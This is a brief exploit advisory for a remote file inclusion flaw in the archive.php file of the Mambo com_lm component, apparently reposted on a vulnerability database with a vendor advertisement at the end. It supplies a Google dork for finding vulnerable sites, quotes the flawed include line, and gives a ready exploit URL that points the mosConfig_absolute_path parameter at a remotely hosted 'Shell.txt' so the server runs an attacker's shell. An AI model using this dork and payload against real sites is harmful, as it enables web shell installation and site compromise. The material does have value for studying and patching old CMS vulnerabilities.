Mambo com_lm component remote file include vulnerabilit
`!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!
--------------------------------------------------------------------------------
Title : Mambo com_lm component (archive.php) Remote File Include Vulnerabilities
--------------------------------------------------------------------------------
#Author: Crackers_Child
#cont@ct: [email protected]
--------------------------------------------------------------------------------
Google Dorks : inurl:"/com_lm/"
------------------------- -------------------------------------------------------
Application : com_lm Component of Mambo
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
Bug
in archive.php
--
// Change the $LM_PATH variable in the eu_config.inc.php file in this directory.
require_once($GLOBALS['mosConfig_absolute_path']."/components/com_lm/public_config.inc.php");
--
--------------------------------------------------------------------------------
Exploit:
http://[target]/[mambo_path]/components/com_lm/archive.php?mosConfig_absolute_path=Shell.txt?
--------------------------------------------------------------------------------
greets:
X_ALPEREN_X,Root_MOr And All Other Friends
--------------------------------------------------------------------------------
--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo